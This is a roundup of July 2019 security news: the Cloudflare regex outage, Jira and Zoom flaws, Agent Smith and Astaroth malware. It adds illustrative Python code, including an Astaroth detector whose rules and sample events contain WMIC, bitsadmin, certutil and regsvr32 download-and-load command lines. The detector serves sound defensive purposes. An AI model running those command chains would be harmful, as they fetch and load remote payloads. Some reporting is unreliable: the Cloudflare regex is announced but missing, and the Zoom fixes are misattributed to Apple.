Tech News - Security

Cloudflare RCA: Major outage was a lot more than “a regular expression went bad”

Savia Lobo
16 Jul 2019
3 min read
On July 2, 2019, Cloudflare suffered a major outage caused by a massive spike in CPU utilization across its network. Ten days later, on July 12, Cloudflare’s CTO John Graham-Cumming released a report detailing how the Cloudflare service went down for 27 minutes.

During the outage, the company speculated that the cause was a single misconfigured rule in the Cloudflare Web Application Firewall (WAF), deployed during a routine rollout of new Cloudflare WAF Managed Rules. That speculation turned out to be correct: the rule exhausted every CPU core that handles HTTP/HTTPS traffic on the Cloudflare network worldwide. Graham-Cumming said they are “constantly improving WAF Managed Rules to respond to new vulnerabilities and threats”.

The CPU exhaustion was caused by a single WAF rule containing a poorly written regular expression that produced excessive backtracking.

Source: Cloudflare report

The regular expression that was at the heart of the outage is :

Graham-Cumming says Cloudflare deploys dozens of new rules to the WAF every week and has numerous systems in place to prevent a deployment from having a negative impact. He shared a list of vulnerabilities that caused the major outage.

What’s Cloudflare doing to mend the situation?

Graham-Cumming said they had stopped all release work on the WAF completely and are following some processes:

For the longer term, he says Cloudflare is “moving away from the Lua WAF that I wrote years ago”. The company plans to port the WAF to its new firewall engine, which lets customers control requests in a flexible and intuitive way, using a syntax inspired by the widely known Wireshark language. This will make the WAF faster and add yet another layer of protection.

Users have appreciated Cloudflare’s quick response to the outage and its complete transparency about the root cause in a full post-mortem report.

https://twitter.com/fatih/status/1150014793253904386
https://twitter.com/nealmcquaid/status/1150754753825165313
https://twitter.com/_stevejansen/status/1150928689053470720

“We are ashamed of the outage and sorry for the impact on our customers. We believe the changes we’ve made mean such an outage will never recur,” Graham-Cumming writes.

Read the complete in-depth report by Cloudflare on their blog post.
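As an added illustration that is not part of Cloudflare’s report or this article, the following Python script shows what “excessive backtracking” looks like in practice and the kind of pre-deployment check that catches it. A constructed pattern with nested quantifiers, ^(a+)+$, is timed against a failing input of growing length and compared with ^a+$, which matches exactly the same strings without any ambiguous split. The pattern, the inputs and the growth threshold are all constructed for illustration; the actual Cloudflare expression is not reproduced here.

```python
"""Added example (not Cloudflare's code): timing a regex to detect catastrophic
backtracking before a rule is deployed. Pattern, inputs and threshold are
constructed for illustration."""
import re
import time

# Constructed pattern with nested quantifiers. A run of n 'a's can be split
# between the inner a+ and the outer (...)+ in 2**(n-1) ways, and when the
# trailing '$' fails the engine retries every one of them.
DANGEROUS = re.compile(r"^(a+)+$")

# Matches exactly the same strings, but with no ambiguous split: the engine
# makes one pass over the input and fails once.
SAFE = re.compile(r"^a+$")


def failing_input(n: int) -> str:
    """Worst case for the pattern: n 'a's followed by a character that makes
    the final '$' anchor fail, so every split is tried before giving up."""
    return "a" * n + "!"


def best_match_time(pattern: re.Pattern, text: str, repeats: int = 3) -> float:
    """Seconds for pattern.match(text), minimum of several runs to limit
    timer noise on inputs that take only microseconds."""
    best = float("inf")
    for _ in range(repeats):
        start = time.perf_counter()
        pattern.match(text)
        best = min(best, time.perf_counter() - start)
    return best


def growth_ratio(pattern: re.Pattern, small: int = 10, large: int = 18) -> float:
    """How much slower the match becomes when the failing input grows from
    `small` to `large` characters. A linear-time pattern stays close to 1;
    exponential backtracking grows by roughly 2**(large - small)."""
    t_small = max(best_match_time(pattern, failing_input(small)), 1e-9)
    t_large = best_match_time(pattern, failing_input(large))
    return t_large / t_small


def looks_exponential(pattern: re.Pattern, threshold: float = 20.0) -> bool:
    """Pre-deployment gate: reject a rule whose match time explodes on a
    slightly longer input. The threshold is a constructed value."""
    return growth_ratio(pattern) > threshold


def same_language(p1: re.Pattern, p2: re.Pattern, samples) -> bool:
    """Sanity check that a rewritten rule accepts and rejects the same
    sample strings as the original, so the fix does not change semantics."""
    return all((p1.match(s) is None) == (p2.match(s) is None) for s in samples)


if __name__ == "__main__":
    samples = ["", "a", "aaaa", "aaaa!", "baaa", failing_input(8)]
    print("same language:", same_language(DANGEROUS, SAFE, samples))
    for name, pat in (("dangerous", DANGEROUS), ("safe", SAFE)):
        print(f"{name}: growth x{growth_ratio(pat):.0f}, "
              f"exponential={looks_exponential(pat)}")
```

The probe keeps the inputs short on purpose: Python’s re module has no match timeout, so a probe that used a long input against a bad pattern would itself hang. Automaton-based engines such as RE2 avoid this class of problem by construction, which is one reason WAF rule pipelines gate new expressions on a worst-case timing check like the one above rather than on a functional test alone.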

EU's satellite navigation system, Galileo, suffers major outage; nears 100 hours of downtime

Savia Lobo
16 Jul 2019
3 min read
Europe’s satellite navigation system, Galileo, has been suffering a major outage since July 11, nearing 100 hours of downtime, due to a “technical incident related to its ground infrastructure”, according to the European GNSS (Global Navigation Satellite System) Agency (GSA).

Funded by the EU, the Galileo program went live with initial services in December 2016 after 17 years of development. It was launched to reduce the EU’s reliance on the US Air Force's Global Positioning System (GPS), and on the Russian government's GLONASS, for commercial, military and other applications such as guiding aircraft. The Galileo satellite network is presently used by satnavs, financial institutions and more. It provides both free and commercial offerings and is widely used by government agencies and private companies for navigation and for search and rescue operations.

GSA’s service status page shows that 24 of the 26 Galileo satellites are listed as "not usable", while the other two have the status "testing".

Source: ZDNet

The outage means the satellites may not be able to provide timing or positioning data to smartphones or other devices in Europe that use the system. According to the BBC, all of the affected users will hardly notice the outage, as their devices “will be relying instead on the data coming from the American Global Positioning System (GPS). They will also depend on the sat-nav chip they have installed, cell phones and other devices might also be making connections with the Russian (Glonass) and Chinese (Beidou) networks”.

On July 11, the GSA released an advisory notifying users that the Galileo satellite signals “may not be available nor meet the minimum performance levels”. It also warned users that these systems “should be employed at users’ own risk”.

On Saturday, July 13, the GSA warned users

Another stern warning by the GSA said Galileo was experiencing a full-service outage and that "signals are not to be used."

On July 14, GSA said the outage affected only the Galileo navigation and satellite-based timing services. However, "the Galileo Search and Rescue (SAR) service -- used for locating and helping people in distress situations for example at sea or mountains -- is unaffected and remains operational."

“Experts are working to restore the situation as soon as possible. An Anomaly Review Board has been immediately set up to analyze the exact root cause and to implement recovery actions”, GSA added.

“Galileo is still in a roll-out, or pilot phase, meaning it would not yet be expected to lead critical applications”, BBC reports. A GSA spokesperson told BBC News, "People should remember that we are still in the 'initial services' phase; we're not in full operation yet”.

However, according to Inside GNSS, a specialist sat-nav site, the problem may lie with the Precise Timing Facility (PTF), a ground station in Italy that gives each satellite in the system an accurate time reference. “time has an impact on the whole constellation!”, Inside GNSS adds.

According to ZDNet, “The downtime also comes after widespread GPS outages were reported across Israel, Iran, Iraq, and Syria at the end of June. Israeli media blamed the downtime on Russian interference, rather than a technical problem”.

https://twitter.com/planet4589/status/1150638285640912897
https://twitter.com/aallan/status/1150427275231420417
https://twitter.com/LeoBodnar/status/1150338536517881856

To know more about this news in detail, head over to Europe GSA’s official blog post.

Microsoft adds Telemetry files in a “security-only update” without prior notice to users

Savia Lobo
12 Jul 2019
4 min read
The recent Windows 7 ‘security-only’ update also includes telemetry components, which users may be unaware of. According to ZDNet, such components may be used to secretly monitor individual PCs, for anything from “innocuous data collection to outright spyware”.

Per Microsoft, "Security-only updates" should not include quality fixes, diagnostic tools or anything other than security updates. In 2016, Microsoft split Windows 7 and 8.1 patching into two parts: a monthly rollup of updates and fixes, and, for those who want only essential patches, a Security-only update package.

Why is this “security-only” update suspicious?

What was surprising about this month's Security-only update, formally titled "July 9, 2019—KB4507456 (Security-only update)," is that it bundled the Compatibility Appraiser, KB2952664, which is designed to identify issues that could prevent a Windows 7 PC from updating to Windows 10.

An anonymous user commented on Woody Leonhard’s post about the July 2019 security update on his website, AskWoody. Leonhard is a Senior Contributing Editor at InfoWorld and Senior Editor at Windows Secrets.

“Warning for group B Windows 7 users! The “July 9, 2019—KB4507456 (Security-only update)” is NOT a “security-only” update. It replaces infamous KB2952664 and contains telemetry. Some details can be found in file information for update 4507456 (keywords: “telemetry”, “diagtrack” and “appraiser”) and under http://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=7cdee6a8-6f30-423e-b02c-3453e14e3a6e (in “Package details”->”This update replaces the following updates” and there is KB2952664 listed). It doesn’t apply for IA-64-based systems, but applies to both x64 and x86-based systems.”

“Microsoft included the KB2952664 functionality (known as the “Compatibility Appraiser”) in the Security Quality Monthly Rollups for Windows 7 back in September 2018. The move was announced by Microsoft ahead of time”, another user with the name @PKCano explains.

The user further added, “With the July 2019-07 Security Only Quality Update KB4507456, Microsoft has slipped this functionality into a security-only patch without any warning, thus adding the “Compatibility Appraiser” and its scheduled tasks (telemetry) to the update. The package details for KB4507456 say it replaces KB2952664 (among other updates).”

“Come on Microsoft. This is not a security-only update. How do you justify this sneaky behavior? Where is the transparency now?”, the user concluded.

ZDNet states, “The Appraiser tool was offered via Windows Update, both separately and as part of a monthly rollup update two years ago; as a result, most of the declining population of Windows 7 PCs already has it installed”. Ed Bott, a technology writer at ZDNet, says that this update is benign and that Microsoft is being truthful when it says "There is no GWX or upgrade functionality contained in this update."

If so, why is Microsoft not briefing users about this update? Many users are confused about whether or not they should install it. A user commented on AskWoody, “So should this update be skipped or installed? This appears to pose a dilemma, at least right now. I hope that some weeks from now, by the time we are closer to a green DEFCON, this has been sorted out”.

Another user speculated that this issue might be resolved in the next update: “Disabling (or deleting) these schedule tasks after installation (before reboot) should be enough to turn off the appraiser
\Microsoft\Windows\Application Experience\ProgramDataUpdater
\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser
\Microsoft\Windows\Application Experience\AitAgent
but it’s best to wait next month to see if the SO update comes clean”

ZDNet suggests this might be because Windows 7 is nearing its end-of-support date, January 14, 2020: “It's also possible that Microsoft thinks it has a strong case for making the Compatibility Appraiser tool mandatory as the Windows 7 end-of-support date nears”.

To know more about this news, visit Microsoft’s security update.

Microsoft introduces passwordless feature in its Windows 10 devices, replaces it with Windows Hello face authentication, fingerprints, or a PIN

Amrata Joshi
12 Jul 2019
3 min read
For most of us, it is difficult to remember passwords across multiple devices and accounts. Also, if one account gets hacked, attackers may be able to gain access to all the other accounts. Features like two-factor authentication (2FA) exist, but not many people use them. To make things simpler for its customers, Microsoft has introduced a "Make your device passwordless” feature in Windows 10.

Just two days ago, the team at Microsoft announced Windows 10 Insider Preview Build 18936 in the Fast ring. The test build comes with a new sign-in option, "Make your device passwordless", in Settings. This means PCs can use Windows Hello face authentication, fingerprints, or a PIN code. The password option will no longer appear on the login screen if users opt in to the “Make your device passwordless” feature.

https://twitter.com/msftsecurity/status/1064926596778401792

According to Microsoft, a PIN code is far more secure than a password, even though a four-digit code appears very simple to use. The advantage is that it relies on variables unknown to an attacker, and the code is stored on the device rather than shared online. Windows 10 stores the private key on the device in a Trusted Platform Module (TPM), a secure chip that keeps the PIN local to that device only.

If a server is compromised or a password is stolen, an attacker can access the user’s device or account. Such an attack wouldn’t be effective against a Windows Hello PIN, because the passwordless feature will still work through Azure Active Directory. It will further lock down business devices and protect valuable data by removing the password.

This feature is currently available only to a set of Fast Ring Insiders and will be made available to others later this week. Users need a FIDO2-compatible security key to try out these new capabilities. Microsoft has also made the public preview of FIDO2 security key support in Azure Active Directory available.

It seems the company has been trying to convince Windows 10 users to opt into two-factor authentication methods such as basic SMS, Windows Hello, the separate Microsoft Authenticator app, or even physical security keys built on the FIDO2 standard.

25 million Android devices infected with 'Agent Smith', a new mobile malware

Vincy Davis
12 Jul 2019
4 min read
Two days ago, Check Point researchers reported a new mobile malware campaign called ‘Agent Smith’, which has infected around 25 million Android devices. The malware is used for financial gain through malicious advertisements. Concealed under the identity of a Google-related app, it exploits known Android vulnerabilities and automatically replaces installed apps with malicious versions, without any consent from the user.

The primary targets are in Asian countries, especially India with over 15 million infected devices, as well as Pakistan, Bangladesh, Saudi Arabia and the UK, with around 300k devices infected in the U.S. Currently, no malicious apps remain on the Google Play Store. However, before being removed, the malicious apps were downloaded over 10 million times. Researchers estimate over 2.8 billion infections in total, on around 25 million unique devices.

Image Source: Check Point Research

How Agent Smith infected Android apps

A preliminary investigation revealed that the app strongly resembled abuse of the Janus vulnerability, discovered in 2017, which allowed attackers to modify the code of Android applications without affecting their signatures. These malicious apps could hide their app icons and claim to be Google-related updaters or vending modules. Check Point researchers found that Agent Smith’s attack also resembled previous malware campaigns against Android apps, such as Gooligan, HummingBad, and CopyCat.

The Agent Smith malware attacks in a step-by-step manner:

Image Source: Check Point Research

Firstly, a dropper app lures a victim into installing it voluntarily. The dropper has an inbuilt Feng Shui Bundle that works as an encrypted asset file. The dropper variants include photo utilities, games, or sex-related apps.

Next, the dropper automatically decrypts and installs its core malware APK, usually disguised as Google Updater, Google Update for U or ‘com.google.vending’. This core malware APK is then used to conduct malicious patching and app updates. The core malware’s icon is hidden from the user at all times.

Lastly, the core malware extracts the device’s installed app list. If it finds apps such as WhatsApp, Flipkart, Jio or Truecaller on its prey list (hard-coded or sent from the C&C server), the malware extracts the base APK of the target app from the device, patches the APK with malicious ad modules, and installs the base APK back, making it look like an update. During this final installation, Agent Smith relies on the Janus vulnerability to bypass Android’s APK integrity checks. Finally, Agent Smith hijacks the compromised apps to show malicious advertisements.

So far the hackers have used Agent Smith for financial gain only. However, with its ability to hide its icon from the launcher and impersonate any popular app on a device, Agent Smith could cause serious harm such as theft of banking credentials and data from shopping and other sensitive apps. It has also come to light that Google fixed the Janus vulnerability in 2017, but the fix has not made its way onto every Android phone.

“Android users should use ad blocker software, always update their devices when prompted, and only download apps from the Google Play Store”, said Dustin Childs, the communications manager at the cybersecurity company Trend Micro.

Many Android users have expressed concern about the Agent Smith malware attack.

https://twitter.com/TMWB1/status/1149337833695600640
https://twitter.com/AkiSolomos/status/1149487532272312324

Some iOS users now say that it is Google’s security vulnerabilities that make users opt for iOS phones. A Redditor comments, “This is unfortunately why I am still an Apple customer. I do not trust android to keep my information safe. Hey Google, how about I pay you a $15 per month subscription and you stop using spyware on me?”

According to the researchers, the malware appears to be run by a Chinese Internet company located in Guangzhou that claims to help Chinese Android developers publish and promote their apps on overseas platforms. Check Point researchers have submitted their report to Google and law enforcement units to facilitate further investigation. The names of the malicious actors have not yet been revealed. Google has not yet released any official statement warning Android users about the Agent Smith malware attack.

For more details about the attack, head over to the Check Point Research page.

A vulnerability found in Jira Server and Data Center allows attackers to remotely execute code on systems

Amrata Joshi
11 Jul 2019
2 min read
Yesterday, Atlassian Support released a Jira security advisory affecting Jira Server and Jira Data Center. The advisory reveals a critical severity security vulnerability, tracked as CVE-2019-11581, which was introduced in version 4.4.0 of Jira Server and Jira Data Center.

How can one exploit this vulnerability?

For this issue to be exploitable, one of the following conditions must hold:

• An SMTP server is configured in Jira and the Contact Administrators Form is enabled, which allows attackers to exploit the issue without authentication.
• An SMTP server is configured in Jira and the attacker has "JIRA Administrators" access, in which case the issue can be exploited using JIRA Administrators’ credentials.

In either case, exploitation of this issue allows an attacker to remotely execute code on systems that run a vulnerable version of Jira Server or Data Center.

The official post reads, “All versions of Jira Server and Data Center from 4.4.0 before 7.6.14 (the fixed version for 7.6.x), from 7.7.0 before 7.13.5 (the fixed version for 7.13.x), from 8.0.0 before 8.0.3 (the fixed version for 8.0.x), from 8.1.0 before 8.1.2 (the fixed version for 8.1.x), and from 8.2.0 before 8.2.3 are affected by this vulnerability.”

To address this issue, the team has fixed the vulnerability in versions 8.2.3, 8.1.2, 8.0.3, 7.13.5 and 7.6.14 of Jira Server and Jira Data Center. Atlassian recommends that users upgrade to the latest version.

How can users quickly mitigate this issue?

As a mitigation, users can first disable the Contact Administrators Form and then block the /secure/admin/SendBulkMail!default.jspa endpoint from being accessed. This can be achieved by denying access in the reverse proxy, load balancer, or Tomcat directly. However, blocking the SendBulkMail endpoint will prevent Jira Administrators from sending bulk emails to users. Hence, after upgrading Jira, users can re-enable the Contact Administrators Form and unblock the SendBulkMail endpoint.

To know more about this news, check out the Jira security advisory.
GE’s 2 models of hospital anesthesia machines found with vulnerabilities, says it won’t harm unless connected to a hospital network

Amrata Joshi
11 Jul 2019
3 min read
As per reports from ZDNet, security researchers from CyberMDX, a healthcare cybersecurity firm, found vulnerabilities in two models of hospital anesthesia machines manufactured by General Electric (GE). The two vulnerable devices are the GE Aestiva and GE Aespire, models 7100 and 7900; according to the researchers, the vulnerabilities reside in the two devices' firmware. The US Department of Homeland Security's Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) has issued a medical advisory for this vulnerability, CVE-2019-10966. It has been assigned a CVSS score of 5.3, indicating medium severity, as per the ICS-CERT report.

According to the researchers, attackers on the same network as the devices can send remote commands that alter the devices' settings. A CyberMDX researcher told ZDNet, "There is simply a lack of authentication." He further added, "The mentioned commands are supported by design. Some of them are only supported on an earlier version of the protocol, however there is another command that allows changing the protocol version (for backward compatibility). After sending a command to change the protocol version to an earlier one, an attacker can send all other commands."

The researcher claims the commands can be used to make unauthorized adjustments to the anesthesia machines' gas composition, including modifying the concentration of oxygen, CO2, N2O and other anesthetic agents, or the gas's barometric pressure. If attackers gain access to a hospital network where either of these devices is connected to a terminal server, they may be able to break into the machine without knowing its IP address or location and remotely change parameters without authorization. According to the CyberMDX researchers, such unauthorized modifications can put patients at risk.

Attackers can also silence device alarms for low or high levels of various agents and modify timestamps inside logs. In a statement to ZDNet, Elad Luz, Head of Research at CyberMDX, said, "The potential for manipulating alarms and gas compositions is obviously troubling." Luz further added, "More subtle but just as problematic is the ability to alter timestamps that reflect and document what happened in surgery."

But as per a statement by GE Healthcare, the vulnerability is not in the device itself, and this particular situation doesn't grant access to data or pose a direct risk to patients. The GE Healthcare statement reads, “While the anesthesia device is in use, the potential gas composition parameter changes, potential device time change, or potential remote alarm silencing actions will not interfere in any way with the delivery of therapy to a patient at the point of delivery, and do not pose any direct clinical harm”.

In an email to ZDNet, GE explained the mitigations: according to GE, the vulnerabilities can be avoided if the anesthesia machines aren't connected to a hospital's network. If the anesthesia machines aren't connected to a hospital network, they can't be exploited, even if a hacker has access to that network.

Apple patched vulnerability in Mac’s Zoom Client; plans to address ‘video on by default’

Savia Lobo
11 Jul 2019
3 min read
After the recent disclosure of the vulnerability in the Mac Zoom client, Apple was quick to patch the vulnerable component. On July 9, the same day security researcher Jonathan Leitschuh revealed the vulnerability publicly, Apple released a patch that removes the local web server entirely and also allows users to manually uninstall Zoom. The Mac Zoom client vulnerability allowed any malicious website to activate a user’s camera and forcibly join them to a Zoom call without their permission. Apple said the update requires no user interaction and is deployed automatically.

How can Mac users ensure they get these updates?

Because the vulnerability was capable of re-installing the Zoom client, Apple first stopped the use of a local web server on Mac devices. It then removed the local web server entirely once the Zoom client was updated. Mac users were prompted in the Zoom user interface (UI) to update their client after the patch was deployed. After the complete update, the local web server is completely removed from that device.

Apple also added a new option to the Zoom menu bar that allows users to manually and completely uninstall the Zoom client, including the local web server. Once the patch is deployed, a new menu option appears that says “Uninstall Zoom.” Clicking that button completely removes Zoom from the user’s device along with the user’s saved settings.

Plans to address ‘video on by default’

Apple has also announced a planned release this weekend (July 12) that will address another security concern, ‘video on by default’. With this July 12 release:

• First-time users who select the “Always turn off my video” box will automatically have their video preference saved. The selection will automatically be applied to the user’s Zoom client settings and their video will be OFF by default for all future meetings.
• Returning users can update their video preferences and make video OFF by default at any time through the Zoom client settings.

Zoom spokesperson Priscilla McCarthy told TechCrunch, “We’re happy to have worked with Apple on testing this update. We expect the web server issue to be resolved today. We appreciate our users’ patience as we continue to work through addressing their concerns.”

Regarding Apple’s quick action to patch the Zoom client vulnerability, Leitschuh tweeted that the willingness to patch represented an “about face”: “it went from rationalizing its existing strategy to planning a fix in a matter of hours”, Engadget reports.

https://twitter.com/JLLeitschuh/status/1148686921528414208

To know more about this news in detail, read the Zoom blog.

ICO to fine Marriott over $124 million for compromising 383 million users’ data last year

Savia Lobo
10 Jul 2019
4 min read
The UK’s watchdog, Information Commissioner's Office (ICO) announced that it plans to impose a fine of more than £99 million ($124 million) under GDPR, on the popular hotel chain, Marriott International over a massive data breach which occurred last year. On November 19, 2018, Marriott revealed that the data breach occurred in Marriott’s Starwood guest database and that this breach was happening over the past four years and collected information about customers who made reservations in its Starwood subsidiary. The company initially said hackers stole the details of roughly 500 million hotel guests. However, with a further thorough investigation the number was later corrected to 383 million. This is ICO’s second announcement of imposing significant fines on companies involved in major data breaches. A few days ago, ICO declared its intentions of issuing British Airways a fine of £183.39M for compromising personal identification information of over 500,000 customers. According to ICO’s official website, “A variety of personal data contained in approximately 339 million guest records globally were exposed by the incident, of which around 30 million related to residents of 31 countries in the European Economic Area (EEA). Seven million related to UK residents.” Information Commissioner Elizabeth Denham, said, “The GDPR makes it clear that organizations must be accountable for the personal data they hold. This can include carrying out proper due diligence when making a corporate acquisition, and putting in place proper accountability measures to assess not only what personal data has been acquired, but also how it is protected.” “Personal data has a real value so organizations have a legal duty to ensure its security, just like they would do with any other asset. If that doesn’t happen, we will not hesitate to take strong action when necessary to protect the rights of the public,” she further added. 
In a filing with the US Securities and Exchange Commission yesterday, Marriott International's President and CEO, Arne Sorenson, said, "We are disappointed with this notice of intent from the ICO, which we will contest. Marriott has been cooperating with the ICO throughout its investigation into the incident, which involved a criminal attack against the Starwood guest reservation database."

"We deeply regret this incident happened. We take the privacy and security of guest information very seriously and continue to work hard to meet the standard of excellence that our guests expect from Marriott", Sorenson added. He also noted that the Starwood guest reservation database that was attacked is no longer used for business operations.

Within hours of Marriott's disclosure last year, two lawsuits were filed against it: one by two Oregon men, Chris Harris and David Johnson, for exposing their data, and another in the state of Maryland by the Baltimore law firm Murphy, Falcon & Murphy. The plaintiffs in the Oregon lawsuit claimed $12.5 billion in costs and losses; the plaintiffs in the Maryland lawsuit did not specify the damages they were seeking from Marriott. According to OregonLive's report last year, "The lawsuit seeks $12.5 billion -- or $25 for each customer whose privacy may have been jeopardized after making a reservation with Starwood brand hotels, including W Hotels, St. Regis, Sheraton, and Westin". OregonLive further reported that the $25 figure was put forward as "a minimum value for the time users will spend canceling credit cards due to the Marriott hack".

Many welcomed the ICO's decision to fine major companies that put customer data at risk. A user on Reddit commented, "Finally!! I am hoping this is a trend and a game changer for the companies to better protect their customer information!".
Another user said, "Great news, The GDPR is working."

To know more about this news in detail, head over to the ICO's official website.

Microsoft Defender ATP detects Astaroth Trojan, a fileless, info-stealing backdoor

Bhagyashree R
09 Jul 2019
3 min read
Yesterday, the Microsoft Defender Advanced Threat Protection (ATP) Research Team shared details of a fileless malware campaign that loads the Astaroth Trojan directly into the memory of infected computers.

https://twitter.com/MsftSecIntel/status/1148262969710698498

Astaroth is an information stealer known for abusing living-off-the-land binaries (LOLBins) such as the Windows Management Instrumentation Command-line tool (WMIC) to steal credentials, keystrokes, and other sensitive data. It sends the stolen data to a remote attacker, who can use it for financial theft or sell the victim's information in the cybercriminal underground. The trojan has been known since 2017 and has affected a few European and Brazilian companies. So far, Microsoft has not disclosed how many machines were compromised in this campaign.

What are fileless threats?

Fileless malware attacks either run the payload directly in memory or use already installed, legitimate applications to carry out the attack. Because they ride on legitimate programs rather than dropping a recognisable malicious executable, they are hard to detect for most security products and even for experienced security analysts. Andrea Lelli, a member of the Microsoft Defender ATP Research Team, argues that hard to detect is not the same as undetectable. "There's no such thing as the perfect cybercrime: even fileless malware leaves a long trail of evidence that advanced detection technologies in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) can detect and stop," he wrote in the blog post.

How is the Astaroth Trojan attack implemented?

During a standard review, Lelli noticed that telemetry showed a sudden increase in the use of the WMIC tool to run a script, which made him suspect a fileless attack. On further investigation he found that the campaign was loading the Astaroth backdoor directly into memory.
Here is how the initial access and execution take place using only system tools (diagram: Source: Microsoft):

The attack begins with a spear-phishing email containing a malicious link that leads the user to an LNK file. When the user double-clicks the LNK file, it runs the WMIC tool with the /Format parameter pointing at a remote stylesheet. WMIC fetches and executes that stylesheet, and the JavaScript embedded in it downloads further payloads by abusing the Bitsadmin tool. The downloaded payloads are Base64-encoded and are decoded with the Certutil tool. Two of them are decoded into plain DLL files; the others remain encrypted. The Regsvr32 tool loads one of the decoded DLLs, which then decrypts and loads the remaining files until Astaroth, the final payload, is injected into the Userinit process.

Every stage of that chain runs a signed Windows binary, so what distinguishes it from normal activity is not the programs involved but their unusual command lines and the parent-child relationship between them, which is exactly the telemetry Lelli was looking at.

How does Microsoft Defender ATP detect and stop these attacks?

Microsoft Defender ATP comes with several advanced technologies to "spot and stop a wide range of attacks." From the cloud it draws on a metadata-based ML engine, a behavior-based ML engine, an AMSI-paired ML engine and a file classification engine, among others. On the client side it includes a memory scanning engine, an emulation engine, a network engine, and more. Here is a diagram of the protection technologies Microsoft Defender ATP comes with (Source: Microsoft).

Check out the official post by Microsoft Defender ATP Research for more details.
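The chain above can be spotted from ordinary process-creation telemetry (image, parent, command line) without any knowledge of the payload. The following is an added example, my code rather than Microsoft's detection logic: it encodes each stage as a narrow command-line rule, walks the process tree under a root process, and reports which stages appear. The event records, file paths and the URL are constructed for the example; they are not from the campaign.

```python
# Added example (not Microsoft's detection logic): flag the LOLBin chain above
# from process-creation events. Event records, paths and the URL are constructed.
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the created process
    cmdline: str   # its command line


# One rule per stage: (stage name, image basename, command-line pattern). The
# patterns are narrow on purpose so that routine admin use of the same tools
# ("wmic process list", "certutil -hashfile") does not fire them.
STAGE_RULES = [
    ("wmic_remote_xsl", "wmic.exe", re.compile(r"/format:\s*[\"']?https?://", re.I)),
    ("bitsadmin_download", "bitsadmin.exe", re.compile(r"/transfer\b.*https?://", re.I)),
    ("certutil_decode", "certutil.exe", re.compile(r"\s-decode\b", re.I)),
    ("regsvr32_user_dll", "regsvr32.exe", re.compile(r"\\(Users|ProgramData)\\.*\.dll\b", re.I)),
]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent):
    """Return the chain stage an event matches, or None."""
    for stage, image, pattern in STAGE_RULES:
        if _basename(ev.image) == image and pattern.search(ev.cmdline):
            return stage
    return None


def descendants(events, root_pid):
    """Every event in the process tree under root_pid, in pid order."""
    by_parent = {}
    for ev in events:
        by_parent.setdefault(ev.ppid, []).append(ev)
    found, todo = [], [root_pid]
    while todo:
        for child in by_parent.get(todo.pop(), []):
            found.append(child)
            todo.append(child.pid)
    return sorted(found, key=lambda e: e.pid)


def chain_stages(events, root_pid):
    """Distinct stages observed under root_pid, in the order they ran."""
    seen = []
    for ev in descendants(events, root_pid):
        stage = classify(ev)
        if stage and stage not in seen:
            seen.append(stage)
    return seen


def is_astaroth_like(events, root_pid, min_stages=3):
    """Any single stage is noisy; three or more under one ancestor is a strong signal."""
    return len(chain_stages(events, root_pid)) >= min_stages


# Constructed sample: explorer.exe (pid 100) runs the LNK target, and the later
# stages are children of the WMIC process. A second tree (pid 200) shows an
# admin using the same binaries legitimately.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(101, 100, r"C:\Windows\System32\wbem\WMIC.exe",
              r'wmic.exe os get /format:"https://example.invalid/v.xsl"'),
    ProcEvent(102, 101, r"C:\Windows\System32\bitsadmin.exe",
              r"bitsadmin.exe /transfer job1 /download /priority foreground "
              r"https://example.invalid/a.b C:\Users\Public\Libraries\a.b"),
    ProcEvent(103, 101, r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -decode C:\Users\Public\Libraries\a.b C:\Users\Public\Libraries\a.dll"),
    ProcEvent(104, 101, r"C:\Windows\System32\regsvr32.exe",
              r"regsvr32.exe /s C:\Users\Public\Libraries\a.dll"),
    ProcEvent(200, 1, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(201, 200, r"C:\Windows\System32\wbem\WMIC.exe", "wmic.exe process list brief"),
    ProcEvent(202, 200, r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -hashfile C:\tools\setup.exe SHA256"),
]

if __name__ == "__main__":
    print(chain_stages(SAMPLE_EVENTS, 100), is_astaroth_like(SAMPLE_EVENTS, 100))
    print(chain_stages(SAMPLE_EVENTS, 200), is_astaroth_like(SAMPLE_EVENTS, 200))
```

The last step the article describes, injection into the Userinit process, does not show up in process-creation events at all; that is the part where the memory-scanning engine mentioned in the post, rather than command-line telemetry, has to do the work.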

A zero-day vulnerability on Mac Zoom Client allows hackers to enable users' camera, leaving 750k companies exposed

Savia Lobo
09 Jul 2019
4 min read
A vulnerability in the Zoom client for Mac allows any malicious website to forcibly join a visitor to a Zoom call, with the camera on, without their consent. The flaw was publicly disclosed today by security researcher Jonathan Leitschuh. It exposes up to 750,000 companies around the world that use the video conferencing app on Macs for day-to-day business. The same mechanism lets a website mount a DoS (Denial of Service) attack on a Mac by repeatedly joining the user to an invalid call. Even if the user uninstalls the app, a localhost web server left on the machine can silently re-install it without the user's permission, as long as the app was installed at least once.

https://twitter.com/OldhamMade/status/1148476854837415936

"This vulnerability leverages the amazingly simple Zoom feature where you can just send anyone a meeting link (for example https://zoom.us/j/492468757) and when they open that link in their browser their Zoom client is magically opened on their local machine", Leitschuh writes.

Leitschuh says he responsibly disclosed the vulnerability on March 26 this year, which under his disclosure policy gave the company 90 days to fix the issue. He suggested a 'quick fix' that Zoom could have implemented simply by changing its server logic. Zoom, however, took 10 days to confirm the vulnerability, and held a meeting about how it would be patched only on June 11th, 2019, 18 days before the end of the 90-day deadline. As of the day before public disclosure, Zoom had implemented only the quick-fix solution. "An organization of this profile and with such a large user base should have been more proactive in protecting their users from attack", Leitschuh says. He also pointed to the remote code execution vulnerability in Zoom reported by Tenable, which was patched only within the last 6 months.
"Had the Tenable vulnerability been combined with this vulnerability it would have allowed RCE against any computer with the Zoom Mac client installed. If a similar future vulnerability were to be found, it would allow any website on the internet to achieve RCE on the user's machine", Leitschuh adds. According to ZDNet, "Leitschuh also pointed out to Zoom that a domain it used for sending out updates was about to expire before May 1, but the domain was renewed in late April".

